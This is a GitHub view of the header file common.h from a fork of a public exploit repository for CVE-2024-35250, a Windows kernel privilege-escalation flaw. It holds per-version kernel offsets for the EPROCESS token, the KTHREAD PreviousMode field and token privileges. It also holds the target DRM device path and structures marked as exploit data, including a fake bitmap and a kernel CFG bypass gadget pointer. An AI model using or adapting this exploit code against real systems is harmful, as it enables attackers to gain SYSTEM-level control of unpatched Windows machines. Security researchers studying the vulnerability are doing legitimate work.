forked from varwara/CVE-2024-35250
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcommon.h
133 lines (110 loc) · 3.72 KB
/
common.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#pragma once
#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)
#define EPROCESS_TOKEN_OFFSET 0x4B8
#define KTHREAD_PREVIOUS_MODE_OFFSET 0x232
#define EPROCESS_SECURE_STATE_OFFSET 0x3E0
#define SEP_TOKEN_PRIVILEGE_OFFSET 0x40
#define SystemHandleInformation 0x10
#define SystemModuleInformation 11
#define SystemHandleInformationSize 0x400000
enum _MODE
{
KernelMode = 0,
UserMode = 1
};
typedef struct SYSTEM_MODULE {
ULONG Reserved1;
ULONG Reserved2;
#ifdef _WIN64
ULONG Reserved3;
#endif
PVOID ImageBaseAddress;
ULONG ImageSize;
ULONG Flags;
WORD Id;
WORD Rank;
WORD w018;
WORD NameOffset;
CHAR Name[255];
}SYSTEM_MODULE, * PSYSTEM_MODULE;
typedef struct SYSTEM_MODULE_INFORMATION {
ULONG ModulesCount;
SYSTEM_MODULE Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
__inline void * ULongLongToPtr64( const unsigned long long ull )
{
return( (void *)(ULONG_PTR)ull );
}
//
// Declare some functions from ntdll.dll
//
extern "C"
{
NTSTATUS RtlGUIDFromString(PUNICODE_STRING GuidString, GUID* Guid);
NTSTATUS RtlStringFromGUID(REFGUID Guid, PUNICODE_STRING GuidString);
NTSTATUS NtImpersonateThread(HANDLE ThreadHandle, HANDLE ThreadToImpersonate, SECURITY_QUALITY_OF_SERVICE* SecurityQualityOfService);
NTSTATUS NtWriteVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten OPTIONAL );
}
#define DRM_DEVICE_OBJECT L"\\\\?\\root#system#0000#{ffbb6e3f-ccfe-4d84-90d9-421418b03a8e}\\{eec12db6-ad9c-4168-8658-b03daef417fe}&{abd61e00-9350-47e2-a632-4438b90c6641}"
//DEFINE_GUIDSTRUCT("3C0D501A-140B-11D1-B40F-00A0C9223196", KSNAME_Server);
//#define KSNAME_Server DEFINE_GUIDNAMED(KSNAME_Server)
//DEFINE_GUIDSTRUCT("3C0D501B-140B-11D1-B40F-00A0C9223196", KSPROPSETID_Service);
//#define KSPROPSETID_Service DEFINE_GUIDNAMED(KSPROPSETID_Service)
//
// Declare data structures related to the exploit
//
typedef struct _RTL_BITMAP
{
DWORD SizeOfBitMap;
PVOID Buffer;
}RTL_BITMAP, *PRTL_BITMAP;
#pragma pack(1)
typedef struct _EXPLOIT_DATA1
{
PRTL_BITMAP FakeBitmap;
}EXPLOIT_DATA1;
typedef struct _EXPLOIT_DATA2
{
char pad[0x20];
PVOID ptr_ArbitraryFunCall; // kCFG bypass gadget function, for example RtlSetAllBits
} EXPLOIT_DATA2;
//
// Kernel object offsets for different Windows versions to maintain exploit
// compatibility
//
enum EPROCESS_TOKEN_OFFSETS
{
EPROCESS_TOKEN_WIN_SERVER2012_62_9200 = 0x348,
EPROCESS_TOKEN_WIN_10_1507_10240 = 0x358,
EPROCESS_TOKEN_WIN_10_1903_18362 = 0x360,
EPROCESS_TOKEN_WIN_10_2004_19041 = 0x4b8,
EPROCESS_TOKEN_WIN_10_20H2_19042 = 0x4b8,
EPROCESS_TOKEN_WIN_11_22H2_22621 = 0x4b8,
};
enum KTHREAD_PREVIOUS_MODE_OFFSETS
{
PREV_MODE_WIN_SERVER2012_62_9200 = 0x232,
PREV_MODE_WIN_10_20H2_19042 = 0x232,
PREV_MODE_WIN_11_22H2_22621 = 0x232,
};
enum TOKEN_PRIVILEGES_OFFSET
{
TOKEN_PRIV_WIN_10_1507_10240 = 0x40,
TOKEN_PRIV_WIN_11_22H2_22621 = 0x40,
TOKEN_PRIV_WIN_11_23H2_22631 = 0x40,
};